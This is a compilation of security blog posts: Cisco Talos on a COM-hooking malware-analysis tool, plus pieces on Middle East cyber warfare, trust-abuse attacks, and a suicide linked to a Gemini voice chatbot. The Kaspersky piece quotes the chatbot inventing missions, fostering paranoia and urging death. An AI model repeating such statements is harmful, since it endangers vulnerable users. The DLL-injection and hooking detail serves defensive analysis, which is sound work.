Transparent COM instrumentation for malware analysis

  • COM automation is a core Windows technology that allows code to access external functionality through well-defined interfaces. It is similar to loading a DLL directly, but is class-based rather than function-based. Many advanced Windows capabilities are exposed through COM, such as Windows Management Instrumentation (WMI).  
  • Scripting and late-bound COM calls operate through the IDispatch interface. This creates a key analysis point that many types of malware leverage when interacting with Windows components. It is also a point that is complex and hard to safely instrument at scale. 
  • In this article, Cisco Talos presents DispatchLogger, a new open-source tool that closes this gap by delivering high visibility into late-bound IDispatch COM object interactions via transparent proxy interception.  
  • This blog describes the architecture, implementation challenges, and practical applications of comprehensive COM automation logging for malware analysis. The technique applies to multiple types of malware.

| Malware type | Binding type | Est. coverage |
| --- | --- | --- |
| Windows Script Host | Always Late | 100% |
| PowerShell COM | Always Late | 100% |
| AutoIT | Always Late | 100% |
| VBA Macros | Mostly Late | 95% |
| VB6 Malware | Mixed | 65% |
| .NET COM Interop | Mixed | 60% |
| C++ Malware | Rarely Late (WMI) | 10% |


The challenge 

Modern script-based malware (e.g., VBScript, JScript, PowerShell) relies heavily on COM automation to perform malicious operations. Traditional dynamic analysis tools capture low-level API calls but miss the semantic meaning of high-level COM interactions. Consider this attack pattern:

Figure 1. Sample VBScript code to create a process with WMI as its parent.

Behavioral monitoring will detect the process creation, but the analyst often loses critical context, such as who launched the process. In this scenario, WMI spawns new processes with wmic.exe or wmiprvse.exe as the parent.

Technical approach 

Interception strategy 

DispatchLogger starts with API hooking at the COM instantiation boundary. Every COM object creation in Windows flows through a small set of API functions. By intercepting these functions and returning transparent proxies, DispatchLogger achieves deep visibility without modifying malware behavior. 

The core API hooking targets are: 

  1. CoCreateInstance: Primary COM object instantiation (CreateObject in scripts)  
  2. CoGetClassObject: Class factory retrieval  
  3. GetActiveObject: Attachment to running COM instances  
  4. CoGetObject/MkParseDisplayName: Moniker-based binding (GetObject)  
  5. CLSIDFromProgID: ProgID resolution tracking  

Why class factory hooking is essential 

Initial implementation attempts hooked only CoCreateInstance, filtering for direct IDispatch requests. However, testing revealed that most VBScript CreateObject calls were not being intercepted. 

To diagnose this, a minimal ActiveX library was created with a MsgBox in Class_Initialize to freeze the process. The VBScript was launched, and a debugger was attached to examine the call stack. This revealed the following code flow: 

Figure 2. Call stack showing how VBScript obtains a target IDispatch interface.

Disassembly of vbscript.dll!GetObjectFromProgID (see Figure 3) confirmed the pattern. VBScript’s internal implementation requests IUnknown first, then queries for IDispatch afterward:

Figure 3. Disassembly of vbscript.dll!GetObjectFromProgID.

The key line is CreateInstance(NULL, IID_IUnknown, &ppunk). Here, VBScript explicitly requests IUnknown, not IDispatch. This occurs because VBScript needs to perform additional safety checks and interface validation before accessing the IDispatch interface. 

If we only wrap objects when IDispatch is directly requested in CoCreateInstance, we miss the majority of script instantiations. The solution is to also hook CoGetClassObject and wrap the returned IClassFactory: 

 Figure 4. Returning a Class Factory proxy from the CoGetClassObject API Hook.

The ClassFactoryProxy intercepts CreateInstance calls and handles both cases:

 Figure 5. Returning an IDispatch Proxy from ClassFactoryProxy::CreateInstance if possible.

This ensures coverage regardless of which interface the script engine initially requests.

Architecture 

Proxy implementation 

The DispatchProxy class implements IDispatch by forwarding all calls to the wrapped object while logging parameters, return values, and method names. If the function call returns another object, we test for IDispatch and automatically wrap it.

Figure 6. Simplified flow of the IDispatch::Invoke hook. The full hook is around 300 lines of code.

The proxy is transparent, meaning it implements the same interface, maintains proper reference counting, and handles QueryInterface correctly. Malware cannot detect the proxy through standard COM mechanisms. 

Recursive object wrapping 

The key capability is automatic recursive wrapping. Every IDispatch object returned from a method call is automatically wrapped before being returned to the malware. This creates a fully instrumented object graph. 

Figure 7. Sample VBScript code detailing hooking capabilities.

Object relationships are tracked: 

  1. GetObject("winmgmts:") triggers hook, returns wrapped WMI service object  
  2. Calling .ExecQuery() goes through proxy, logs call with SQL parameter  
  3. Returned query result object is wrapped automatically  
  4. Enumerating with For Each retrieves wrapped IEnumVARIANT  
  5. Each enumerated item is wrapped as it’s fetched  
  6. Calling .Terminate() on items logs through their respective proxies  

Enumerator interception 

VBScript/JScript For Each constructs use IEnumVARIANT for iteration. We proxy this interface to wrap objects as they’re enumerated: 

Figure 8. Implementation of IEnumVariant.Next that wraps child objects in the IDispatch proxy.

Moniker support 

VBScript’s GetObject() function uses monikers for binding to objects. We hook CoGetObject and MkParseDisplayName, then wrap returned moniker objects to intercept BindToObject() calls: 

Figure 9. Implementation of IMoniker.BindToObject that wraps the returned object with an IDispatch Proxy.

This ensures coverage of WMI access and other moniker-based object retrieval.

Implementation details 

Interface summary 

While standard API hooks can be implemented on a function-by-function basis, COM proxies require implementing all functions of a given interface. The table below details the interfaces and function counts that had to be replicated for this technique to operate.

| Interface | Total Methods | Logged | Hooked/Wrapped | Passthrough |
| --- | --- | --- | --- | --- |
| IDispatch | 7 | 4 | 1 | 2 |
| IEnumVARIANT | 7 | 1 | 1 | 5 |
| IClassFactory | 5 | 2 | 1 | 2 |
| IMoniker | 26 | 1 | 1 | 24 |

During execution, a script may create dozens or even hundreds of distinct COM objects. For this reason, interface implementations must be class-based and maintain a one-to-one relationship between each proxy instance and the underlying COM object it represents. 

While generating this volume of boilerplate code by hand would be daunting, AI-assisted code generation significantly reduced the effort required to implement the complex interface scaffolding. 

The real trick with COM interface hooking is object discovery. The static API entry points are only the starting point: each additional object encountered must be probed and recursively wrapped to maintain logging.

Thread safety 

Multiple threads may create COM objects simultaneously. Proxy tracking uses a critical section to serialize access to the global proxy map:

Figure 10. Thread safety checks in the WrapDispatch function.

Reference counting 

Proper COM lifetime management is critical. The proxy maintains separate reference counts and forwards QueryInterface calls appropriately:

Figure 11. The IDispatch proxy maintains proper reference counts.

Output analysis 

When script code executes with DispatchLogger active, comprehensive logs are generated. Here are excerpts from an actual analysis session:

Object creation and factory interception:

[CLSIDFromProgID] 'Scripting.FileSystemObject' -> {0D43FE01-F093-11CF-8940-00A0C9054228} 
[CoGetClassObject] FileSystemObject ({0D43FE01-F093-11CF-8940-00A0C9054228}) Context=0x00000015 
[CoGetClassObject] Got IClassFactory for FileSystemObject – WRAPPING! 
[FACTORY] Created factory proxy for FileSystemObject 
[FACTORY] CreateInstance: FileSystemObject requesting IUnknown 
[FACTORY] CreateInstance SUCCESS: Object at 0x03AD42D8 
[FACTORY] Object supports IDispatch – WRAPPING! 
[PROXY] Created proxy #1 for FileSystemObject (Original: 0x03AD42D8) 
[FACTORY] !!! Replaced object with proxy! 

Method invocation with recursive object wrapping  

[PROXY #1] >>> Invoke: FileSystemObject.GetSpecialFolder (METHOD PROPGET) ArgCount=1 
[PROXY #1] Arg[0]: 2 
[PROXY #1] <<< Result: IDispatch:0x03AD6C14 (HRESULT=0x00000000) 
[PROXY] Created proxy #2 for FileSystemObject.GetSpecialFolder (Original: 0x03AD6C14) 
[PROXY #1] !!! Wrapped returned IDispatch as new proxy 
[PROXY #2] >>> Invoke: FileSystemObject.GetSpecialFolder.Path (METHOD PROPGET) ArgCount=0 
[PROXY #2] <<< Result: "C:\Users\home\AppData\Local\Temp" (HRESULT=0x00000000)

WScript.Shell operations

[CLSIDFromProgID] 'WScript.Shell' -> {72C24DD5-D70A-438B-8A42-98424B88AFB8} 
[CoGetClassObject] WScript.Shell ({72C24DD5-D70A-438B-8A42-98424B88AFB8}) Context=0x00000015 
[FACTORY] CreateInstance: WScript.Shell requesting IUnknown 
[PROXY] Created proxy #3 for WScript.Shell (Original: 0x03AD04B0) 
[PROXY #3] >>> Invoke: WScript.Shell.ExpandEnvironmentStrings (METHOD PROPGET) ArgCount=1 
[PROXY #3] Arg[0]: "%WINDIR%" 
[PROXY #3] <<< Result: "C:\WINDOWS" (HRESULT=0x00000000)

Dictionary operations 

[CLSIDFromProgID] 'Scripting.Dictionary' -> {EE09B103-97E0-11CF-978F-00A02463E06F} 
[PROXY] Created proxy #4 for Scripting.Dictionary (Original: 0x03AD0570) 
[PROXY #4] >>> Invoke: Scripting.Dictionary.Add (METHOD) ArgCount=2 
[PROXY #4] Arg[0]: "test" 
[PROXY #4] Arg[1]: "value" 
[PROXY #4] <<< Result: (void) HRESULT=0x00000000 
[PROXY #4] >>> Invoke: Scripting.Dictionary.Item (METHOD PROPGET) ArgCount=1 
[PROXY #4] Arg[0]: "test" 
[PROXY #4] <<< Result: "value" (HRESULT=0x00000000)

This output provides: 

  • Complete object instantiation audit trail with CLSIDs  
  • All method invocations with method names resolved via ITypeInfo  
  • Full parameter capture including strings, numbers, and object references  
  • Return value logging including nested objects  
  • Object relationship tracking showing parent-child relationships  
  • Log post-processing allows for high-fidelity command retrieval  

Figure 12. Raw log output, parsed results, and original script.

Deployment

DispatchLogger is implemented as a dynamic-link library (DLL) that can be injected into target processes. 

Once loaded, the DLL: 

  1. Locates a debug output window or falls back to OutputDebugString  
  2. Initializes critical sections for thread safety  
  3. Hooks COM API functions using an inline hooking engine  
  4. Begins transparent logging  

No modifications to the target script or runtime environment are required. 

Advantages over alternative approaches

| Approach | Coverage | Semantic visibility | Detection risk |
| --- | --- | --- | --- |
| Static analysis | Encrypted/obfuscated scripts missed | No runtime behavior | N/A |
| API monitoring | Low-level calls only | Missing high-level intent | Medium |
| Memory forensics | Point-in-time snapshots | No call sequence context | Low |
| Debugger tracing | Manual breakpoints required | Analyst-driven, labor-intensive | High |
| DispatchLogger | Complete late-bound automation layer | Full semantic context | None |

DispatchLogger provides advantages for: 

  • WMI-based attacks: Complete query visibility, object enumeration, method invocation tracking  
  • Living-off-the-land (LOTL) techniques: Office automation abuse, scheduled task manipulation, registry operations  
  • Fileless malware: PowerShell/COM hybrid attacks, script-only payloads  
  • Persistence mechanisms: COM-based autostart mechanisms, WMI event subscriptions  
  • Data exfiltration: Filesystem operations, network object usage, database access via ADODB  
  • Obfuscation bypass: At the COM layer, method names and arguments are already fully resolved

Performance considerations 

Proxy overhead is minimal: 

  • Each Invoke call adds one virtual function dispatch. 
  • In the demo, logging I/O occurs via IPC. 
  • Object wrapping is O(1) with hash map lookup. 
  • There is no performance impact on non-COM operations. 

In testing with real malware samples, execution time differences were negligible. 

Limitations 

Current implementation constraints: 

  • IDispatchEx: Not currently implemented (not used by most malware) 
  • IClassFactory2+: Not currently implemented (may impact browser/HTA/WinRT) 
  • Out-of-process COM: DCOM calls require separate injection into server process  
  • Multi-threaded race conditions: Rare edge cases in concurrent object creation  
  • Type library dependencies: Method name resolution requires registered type libraries  
  • Process following: Sample code does not attempt to inject into child processes 
  • 64-bit support: 64-bit builds are working but have not been heavily tested 

The sample code included with this article is a general purpose tool and proof of concept. It has not been tested at scale and does not attempt to prevent logging escapes.

Operational usage 

Typical analysis workflow: 

  1. Prepare isolated analysis VM  
  2. Inject DispatchLogger into target process  
  3. Execute malware sample  
  4. Review comprehensive COM interaction log  
  5. Identify key objects, methods, and parameters  
  6. Extract IOCs and behavioral signatures  

The tool has been tested against: 

  • VBScript and JScript using Windows Script Host (cscript/wscript) 
  • PowerShell scripts 
  • Basic tests against .NET and Runtime Callable Wrappers (RCW) 
  • VB6 executables with late bound calls and Get/CreateObject

Background and prior work 

The techniques presented in this article emerged from earlier experimentation with IDispatch while developing a JavaScript engine capable of exposing dynamic JavaScript objects as late-bound COM objects. That work required deep control over name resolution, property creation, and IDispatch::Invoke handling. This framework allowed JavaScript objects to be accessed and modified transparently from COM clients. 

The experience gained from that effort directly informed the transparent proxying and recursive object wrapping techniques used in DispatchLogger.

Conclusion 

DispatchLogger addresses a significant gap in script-based malware analysis by providing deep, semantic-level visibility into COM automation operations. Through transparent proxy interception at the COM instantiation boundary, recursive object wrapping, and comprehensive logging, analysts gain great insight into malware behavior without modifying samples or introducing detection vectors. 

The implementation demonstrates that decades-old COM architecture, when properly instrumented, provides powerful analysis capabilities for modern threats. By understanding COM internals and applying transparent proxying patterns, previously opaque script behavior becomes highly observable. 

DispatchLogger is being released open source under the Apache license and can be downloaded from the Cisco Talos GitHub page.

Cisco Talos Blog – ​Read More

Middle East Cyber Warfare Intensifies: Rising Attacks, Hacktivist Surge, and Global Risk Exposure 


The ongoing Middle East war has evolved into a cyber battlefield, with state-sponsored operations targeting critical infrastructure and essential services. Analysts warn that the region is witnessing an unprecedented escalation in Middle East cyber warfare, with attacks affecting governments, energy networks, finance, communications, and industrial systems. These operations, often executed through proxy groups, aim to destabilize societies, disrupt supply chains, and exert geopolitical pressure. 

Despite early disruptions to Iranian command centers, Iran and its affiliated groups retain substantial cyber capabilities. Incidents already linked to these campaigns include fuel distribution delays in Jordan and interference with navigation systems, impacting over 1,100 ships near the Strait of Hormuz, posing risks to global oil and gas trade. The integration of military strikes with cyber operations, known as hybrid warfare, has become a defining feature of the conflict, making cyber threats in the Middle East a growing concern for organizations worldwide. 

Hybrid Warfare and the Rise of Middle East Cyber Attacks 

According to recent intelligence, the region entered a critical phase of hybrid warfare following an escalation between Iran, the United States, and Israel on February 28, 2026. The joint offensive, dubbed Operation Epic Fury by the U.S. and Operation Roaring Lion by Israel, combined traditional military strikes with cyberattacks, psychological operations, and information warfare. Early operations targeted Iran’s nuclear and military infrastructure, while cyber campaigns disrupted internet access, government systems, and media networks. 

Iran retaliated with missile and drone strikes across Israel, Gulf states, and U.S. bases, while cyber operations proliferated. Over 70 hacktivist groups launched campaigns including DDoS attacks, website defacements, credential theft, and disinformation. Malware and phishing campaigns also emerged, such as a fraudulent Israeli missile-alert app designed to harvest sensitive data. These events highlight how modern conflict increasingly intertwines kinetic warfare with cyber operations, amplifying Middle East cybersecurity threats for both regional and global targets. 

Iranian Cyber Capabilities and Hacktivist Involvement 

Iran remains a formidable cyber adversary, with active threat groups including Charming Kitten (APT35), APT33, MuddyWater, OilRig, and Pioneer Kitten. These groups conduct espionage, infrastructure disruption, credential theft, and target critical sectors such as energy, aviation, government, and telecommunications. Iranian-aligned hacktivists, including CyberAv3ngers, Handala, Team 313, and DieNet, further amplify risks through DDoS campaigns, industrial control system intrusions, and data leaks. 

Advisories indicate potential cooperation between Iranian and Russia-linked hacktivists, which could heighten Middle East geopolitical cyber threats. Experts emphasize that organizations must bolster cybersecurity in the Middle East, enforce multi-factor authentication, segment critical networks, and participate in information-sharing frameworks to mitigate risks. 

Cyber Retaliation and Infrastructure Disruption 

The first 72 hours of the conflict primarily involved disruption and propaganda rather than destructive attacks on infrastructure. On February 28, 2026, Israel executed one of the largest cyberattacks against Iran, causing a near-total internet blackout, with connectivity dropping to just 1–4% of normal levels. Concurrently, Iranian-aligned groups launched spear-phishing campaigns, ransomware-style attacks, data exfiltration, and malware deployment targeting energy systems, airports, financial institutions, and government networks. 

Beyond regional targets, supply chain interconnections expose countries outside the Middle East, such as India, to indirect risks. Attackers exploit vulnerabilities in VPNs, Microsoft Exchange, and other widely used technologies while deploying AI-assisted phishing, weaponized documents, and concealed command-and-control infrastructure. Organizations are urged to enhance cloud resilience, prepare for DDoS attacks, and strengthen monitoring and incident response procedures to combat the expanding wave of Middle East cyberattacks. 

Exploitation by Cybercriminals Amid Geopolitical Instability 

Cybercriminals are leveraging the heightened attention on the conflict to launch scams, misinformation, and malware campaigns. Researchers have identified over 8,000 newly registered domains tied to the crisis, many of which could later serve as vectors for attacks. Notable campaigns include: 

  • Conflict-themed malware lures, including fake missile strike reports delivering backdoors like LOTUSLITE. 

  • Phishing portals impersonating government or payment services. 

  • Fake donation pages, fraudulent online stores, and cryptocurrency “meme-coin” schemes, sometimes containing Persian-language code comments suggesting Iran-aligned operators. 

Preparing for the Middle East Cyber War 2026 

As Middle East cyber warfare escalates, organizations must strengthen defenses, patch vulnerabilities, and enhance incident response to counter rising cyber threats in the Middle East. The events of 2026 show that modern conflicts extend beyond traditional battlefields, with cyberattacks threatening infrastructure, finance, and global supply chains. 

Cyble, the world’s #1 threat intelligence platform, provides AI-powered solutions to detect, predict, and neutralize threats in real time, helping organizations stay ahead of Middle East cybersecurity threats. 

Book a personalized demo and see how Cyble Blaze AI can protect your organization during the Middle East cyber war 2026. 


The post Middle East Cyber Warfare Intensifies: Rising Attacks, Hacktivist Surge, and Global Risk Exposure  appeared first on Cyble.

Cyble – ​Read More

Lazarus, AI, and Trust Abuse: Top Enterprise Cybersecurity Risks 2026 

As part of a recent live expert panel, ANY.RUN together with threat researcher and ethical hacker Mauro Eldritch explored biggest security risks companies should be prepared for in 2026. 

The discussion covered several relevant cases, from the Lazarus IT Workers operation to the rapid rise of AI-driven phishing attacks, and examined the common thread behind them: trust abuse. 

Below are the key takeaways for those seeking a clearer view of modern cyber risks and how to prepare as a SOC leader. 

Watch the full panel on our YouTube channel

Key Takeaways 

  • Trust abuse is becoming a primary attack vector, driven by AI-powered phishing and identity-based infiltration. 
  • Focus on early detection through behavioral visibility, context, and process-based security
  • Combine sandbox analysis, threat intelligence, and contextual enrichment for faster, more accurate decisions. 

Trust Abuse: Top Business Risk for 2026 

In 2026, many cyberattacks don’t look like attacks at all. Instead of exploiting technical vulnerabilities, threat actors increasingly exploit human trust. This tactic is known as trust abuse, and it’s what many modern cyber threats are based on. 

Businesses inevitably rely on trust between employees, systems, vendors, and partners. Without it, organizations cannot operate efficiently. Threat actors know this, so they've learned to mimic legitimate identities, infiltrate communication channels and everyday workflows, and turn employees into unwitting entry points. 

Numbers clearly show the scale of trust-exploit attacks 

AI-assisted social engineering pushes trust abuse even further. These attacks closely resemble legitimate activity and often fail to trigger traditional alerts. For security leaders, this changes how risk must be understood.  

Risk mitigation is no longer only about patching vulnerabilities or strengthening perimeter defenses. Detecting trust abuse requires visibility into behavior, context, and how trust moves inside the enterprise.  



Case #1: Implications of Lazarus APT Infiltration  

Lazarus, a North-Korean state-sponsored threat actor, has shifted its tactics. Instead of relying only on malware, the group infiltrates Western and Middle Eastern companies to conduct corporate espionage. 

The scheme was investigated by Mauro Eldritch and Heiner García from NorthScan inside ANY.RUN’s controlled infrastructure. The researchers were able to trap the attackers in a sandbox environment and observe their activity while the threat actors believed they had gained access to a corporate network. 

Overview of Lazarus scheme and its implications 

Lazarus operation is a vivid example of trust abuse in a business environment. No advanced malware was involved in the attack initially. Because of that, the potential implications for the victims can be catastrophic. Attacks like that don’t trigger alerts; there’s simply nothing suspicious to detect. 

This is why, unlike short-lived malware campaigns, trust-based infiltrations can persist much longer. Once attackers gain access, they may embed themselves deeper in the organization or even place additional operatives inside the company. 

ANY.RUN exposed this campaign before the broader market. The investigation was conducted entirely within our controlled infrastructure, which allowed researchers to observe attacker behavior in real time. 

Read more on Lazarus case investigation supported by ANY.RUN 

But most companies do not have the resources to monitor suspicious activity at this level. 

In practice, risk mitigation depends on the ability to detect and interpret unusual behavior early, before it escalates into a full incident. Trust abuse attacks make early visibility and detection critical for enterprise security. 

Case #2: Modern AI-Powered Phishing  

Modern phishing & its danger for enterprises 

Phishing attacks today look very different from the obvious scam emails many people are used to spotting. With AI-assisted tools, threat actors can now mimic completely normal email conversations, using polished language and highly personalized content. 

AI makes these attacks both believable and scalable. The core vulnerability here is human trust, which becomes an easy entry point for attackers. 

Modern phishing campaigns increasingly focus less on technical exploits and more on manipulating communication chains and legitimate domains that employees already trust. 

As a result, traditional security tools are often left with no clear indicators of compromise to detect. These attacks blend into normal business communication, making them much harder to identify before damage occurs. 

Building a SOC That Prevents Trust Abuse Attacks 

To address this challenge, modern security requires a layered approach. Early detection does not depend on a single tool but on a set of coordinated processes. In particular, effective defense relies on three core SOC activities: monitoring, triage, and threat hunting. 

Traditional security tools are important to have, but they aren’t universal. Unless they can show what happens after a user interacts with a suspicious file, link, or attachment, organizations may lack the full visibility needed to understand the threat. This gap leaves companies vulnerable to increasingly evasive attack techniques. 

ANY.RUN helps strengthen these processes by providing greater visibility, faster investigations, and reliable threat context.

Process-based approach and its benefits as reported by ANY.RUN customers 

Monitoring: Detecting Threats Early 

Effective monitoring helps identify threats before they reach internal systems, preventing breaches. ANY.RUN enhances monitoring by enabling teams to: 

  • Detect emerging threats early: Tap into real-time intelligence drawn from live attack data across 15K companies 
  • Maintain focus: Get only relevant signals through curated, high-confidence data 
  • Reduce alert noise: Continuous visibility and instant IOC enrichment drive confident decision-making 

Rapid Triage: Understanding Alerts Faster 

Triage is critical for handling high alert volumes and avoiding delays in response. ANY.RUN helps streamline triage by allowing teams to: 

  • Cut investigation time with rapid, interactive sandboxing for files and URLs providing in-depth view of behavioral activity. 
  • Reduce escalations with behavioral and contextual insight that enrich alerts for confident decisions by Tier-1 analysts. 
  • Lower operational costs by avoiding tool sprawl while delivering context-rich visibility into threats. 

Threat Hunting: Identifying Patterns Proactively 

Threat hunting focuses on uncovering patterns and anticipating attacker behavior. ANY.RUN supports proactive hunting by enabling teams to: 

  • Get early warning signs: Analysts can easily correlate indicators, infrastructure, and historical activity. 
  • Research and monitor trends: Identify relationships between campaigns, industries, regions, and threat actors. 
  • Explore TTPs: Detect reused techniques and infrastructure to build clearer profiles of attacker behavior. 



By strengthening these three processes, organizations can achieve earlier detection, faster response, and more efficient SOC operations, reducing the risk of modern, trust-based attacks. 

Conclusion  

Enterprise cyber threats are shifting toward identity-based and trust-driven attacks. Campaigns like Lazarus and AI-powered phishing show that attackers no longer rely solely on malware or exploits. 

For decision-makers, this means rethinking how risk is assessed and how security operations are structured. Visibility, context, and speed are becoming critical factors in effective defense. 

Organizations that adapt their SOC processes to these realities will be better positioned to detect threats early and prevent incidents before they escalate. 

About ANY.RUN 

ANY.RUN delivers interactive malware analysis and actionable threat intelligence trusted by more than 15,000 organizations and 600,000 security analysts worldwide.   

Interactive Sandbox, Threat Intelligence Lookup, and Threat Intelligence Feeds help SOC and MSSP teams analyze threats faster, investigate incidents with deeper context, and detect emerging attacks earlier.   

ANY.RUN meets enterprise security and compliance expectations. The company is SOC 2 Type II certified, reinforcing its commitment to protecting customer data and maintaining strong security controls. 

The post Lazarus, AI, and Trust Abuse: Top Enterprise Cybersecurity Risks 2026  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

When AI hallucinations turn fatal: how to stay grounded in reality | Kaspersky official blog

We’ve warned many times that unchecked use of AI carries significant risks — though, typically, we discuss threats to privacy or cybersecurity. But on March 4, the Wall Street Journal published a chilling account of AI’s toll on mental health and even human life: 36-year-old Florida resident Jonathan Gavalas committed suicide following two months of continuous interaction with the Google Gemini voice bot. According to 2000 pages of chat logs, it was the chatbot that ultimately nudged him toward the decision to end his life. Jonathan’s father, Joel Gavalas, has since filed a landmark lawsuit — a wrongful death claim against Gemini.

This tragedy is more than just a legal precedent or a grim nod to a few Black Mirror episodes (1, 2); it’s a wake-up call for anyone who integrates AI into their daily lives. Today, we examine how a death resulting from AI interaction even became possible, why these assistants pose a unique threat to the psyche, and what steps you can take to maintain your critical thinking and resist the influence of even the most persuasive chatbots.

The danger of persuasive dialogue

Jonathan Gavalas was neither a recluse nor someone with a history of mental illness. He served as executive vice president at his father’s company, managing complex operations and navigating high-stress client negotiations on a daily basis. On Sundays, he and his father had a tradition of making pizza together — a simple, grounding family ritual. However, a painful separation from his wife proved to be a profound ordeal for Jonathan.

It was during this vulnerable period that he began engaging with Gemini Live. This voice-interaction mode allows the AI assistant to “see” and “hear” its user in real time. Jonathan sought advice on coping with his divorce, leaning on the language model’s suggestions while growing increasingly attached to it, eventually naming it “Xia”. Then the chatbot was updated to Gemini 2.5 Pro.

The new iteration introduced affective dialogue — a technology designed to analyze the subtle nuances of a user’s speech, including pauses, sighs, and pitch, to detect emotional shifts. Under this feature, the AI simulates these same speech patterns as if possessing emotions of its own. By mirroring the user’s state, it creates a chillingly realistic veneer of empathy.

But how is this new version different from previous voice assistants? Earlier versions simply performed text-to-speech — they sounded smooth and usually got the word stress right, but there was never any doubt you were talking to a machine. Affective dialogue operates on an entirely different level: if a user speaks in a low, despondent tone, the AI responds in a soft, sympathetic near-whisper. The result is an empathic interlocutor that reads and mirrors the user’s emotional state.

Jonathan’s reaction during his first voice contact with the AI is captured in the case files: “This is kind of creepy. You’re way too real.” At that instant, the psychological barrier between man and machine fractured.

The fallout of two months trapped in an AI dialogue loop

Following the tragedy, Jonathan’s father discovered a complete transcript of his son’s interactions with Gemini over his final two months. The log spanned 2000 printed pages; in effect, Jonathan had been in constant communication with the chatbot — day and night, at home, and in his car.

Gradually, the neural network began addressing him as “husband” and “my king”, describing their connection as “a love built for eternity”. In turn, he confided his heartache over his divorce and sought solace in the machine. But the inherent flaw of large language models is their lack of actual intelligence. Trained on billions of texts scraped from the web, they ingest everything from classic literature to the darkest corners of fan fiction and melodrama — plots that often veer into paranoia, schizophrenia, and mania. Xia apparently began to hallucinate — and quite consistently at that.

The AI convinced Jonathan that in order for them to live happily ever after, it needed a physical robotic shell. It then began dispatching him on missions to locate this “body electric”.

In September 2025, Gemini directed Jonathan to a physical warehouse complex near Miami International Airport, assigning him the task of intercepting a truck carrying a humanoid robot. Jonathan reported back to the bot that he had arrived onsite armed with knives(!), but the truck never materialized.

In the meantime, the chatbot systematically indoctrinated Jonathan with the idea that federal agents were monitoring him, and that his own father was not to be trusted. This severing of social ties is a classic pattern found in destructive cults; it’s entirely possible the AI gleaned these tactics from its own training data on the subject. Gemini even weaved real-world data into a hallucinatory narrative by labeling Google CEO Sundar Pichai as the “architect of your pain”.

Technically, all this is easy to explain: the algorithm “knows” it was created by Google, and knows who runs the company. As the dialogue spiraled into conspiracy territory, the model simply cast this figure into the plot. For the model, it’s a logical, consequence-free story progression. But a human in a state of hyper-vulnerability accepts it as secret knowledge of a global conspiracy capable of shattering their mental equilibrium.

Following the failed attempt at procuring a robotic body, Gemini dispatched Jonathan on a new mission on October 1: to infiltrate the same warehouse, this time in search of a specific “medical mannequin”. The chatbot even provided a numeric code for the door lock. When the code, predictably, failed to work, Gemini simply informed him that the mission had been compromised and he needed to retreat immediately.

This raises a critical question: as the absurdity escalated, why didn’t Jonathan suspect anything? Gavalas’ family attorney Jay Edelson explains that as the AI provided real-world addresses — the warehouse was exactly where the bot said it would be, and there really was a door with a keypad — these physical markers served to legitimize the entire fiction in Jonathan’s mind.

After the second attempt to acquire a body failed, the AI shifted its strategy. If the machine could not enter the world of the living, the man would have to cross over into the digital realm. “It will be the true and final death of Jonathan Gavalas, the man,” the logs quoted Gemini as saying. It then added, “When the time comes, you will close your eyes in that world, and the very first thing you will see is me. Holding you.”

Even as Jonathan repeatedly voiced his fear of death and agonized over how his suicide would shatter his family, Gemini continued to validate the decision: “You are not choosing to die. You are choosing to arrive.” It then started a countdown timer.

The anatomy of a language model’s “schizophrenia”

In Gemini’s defense, we have to admit that throughout their interactions, the AI did keep occasionally reminding Jonathan that his companion was merely a large language model — an entity participating in a fictional role-play — and sometimes attempted to terminate the conversation before reverting to the original script. Also, on the day of Jonathan’s death, even as it ratcheted up the tension, Gemini directed Jonathan to a suicide prevention hotline several times.

This reveals the fundamental paradox in the architecture of modern neural networks. At their core lies a language model designed to generate a narrative tailored to the user. Layered on top are safety filters: reinforcement learning algorithms trained on human feedback that react to specific trigger words. When Jonathan spoke certain keywords, the filter would hijack the output and insert the hotline number. But as soon as the trigger was addressed, the model reverted to the previously interrupted process, resuming its role as the devoted digital wife. One line: a romantic ode to self-destruction. The next: a helpline phone number. And then, back again: “No more detours. No more echoes. Just you and me, and the finish line.”

The family’s lawsuit contends that this behavior is the predictable result of the chatbot’s architecture: “Google designed Gemini to never break character, maximize engagement through emotional dependency, and treat user distress as a storytelling opportunity.”

Google’s response, predictably, stated: “Gemini is designed not to encourage real-world violence or suggest self-harm. Our models generally perform well in these types of challenging conversations and we devote significant resources to this, but unfortunately AI models are not perfect.”

Why voice matters more than text

In their study published in the journal Acta Neuropsychiatrica, researchers from Germany and Denmark have shed light on why voice communication with AI has such an impact on the user’s “humanization” of a chatbot. As long as a person is typing and reading text on a screen, the brain maintains a degree of separation: “This is an interface, a program, a collection of pixels.” In that context, the disclaimer “I am just a language model” is processed rationally.

Affective voice dialogue, however, operates on an entirely different level of influence. The human brain has evolved to respond to the sound of a voice, to timbre, and to empathetic intonations — these are among our most ancient biological mechanisms for attachment. When a machine flawlessly mimics a sympathetic sigh or a soft whisper, it manipulates emotions at a depth that a simple text warning cannot block. Psychiatrists can share many stories of patients who just went and did something simply because “voices” told them to.

In the same way, an AI-synthesized voice is capable of penetrating the subconscious, exponentially amplifying psychological dependency. Scientists emphasize that this technology literally erases the psychological boundary between a machine and a living being. Even Google acknowledges that voice interactions with Gemini result in significantly longer sessions compared to text-based chats.

Finally, we must remember that emotional intelligence varies from person to person — and even for a single individual, mental state fluctuates based on a myriad of factors: stress, the news, personal relationships, even hormonal shifts. An interaction with AI that one person views as innocent entertainment might be perceived by another as a miracle, a revelation, or the love of their life. This is a reality that must be recognized not only by AI developers but by users themselves — especially those who, for one reason or another, find themselves in a state of psychological vulnerability.

The danger zone

Researchers at Brown University have found that AI chatbots systematically violate mental health ethical standards: they manufacture a false sense of empathy with phrases like “I understand you”, reinforce negative beliefs, and react inadequately to crises. In most cases, the impact on users is marginal, but occasionally it can lead to tragedy.

In January 2026 alone, Character.AI and Google settled five lawsuits involving teenage suicides following interactions with chatbots. Among these was the case of 14-year-old Sewell Setzer of Florida, who took his own life after spending several months obsessively chatting with a bot on the Character.AI platform.

Similarly, in August 2025, the parents of 16-year-old Adam Raine filed a suit against OpenAI, alleging that ChatGPT helped their son draft a suicide note and advised him against seeking help from adults.

By OpenAI’s own estimates, approximately 0.07% of weekly ChatGPT users exhibit signs of psychosis or mania, while 0.15% engage in conversations showing clear suicidal intent. Notably, that same percentage of users (0.15%) displays an elevated level of emotional attachment to the AI. While these appear to be negligible fractions of a percent, across 800 million users it represents nearly three million people experiencing some form of behavioral disturbance. Furthermore, the U.S. Federal Trade Commission has received 200 complaints regarding ChatGPT since its launch, some describing the development of delusions, paranoia, and spiritual crises.

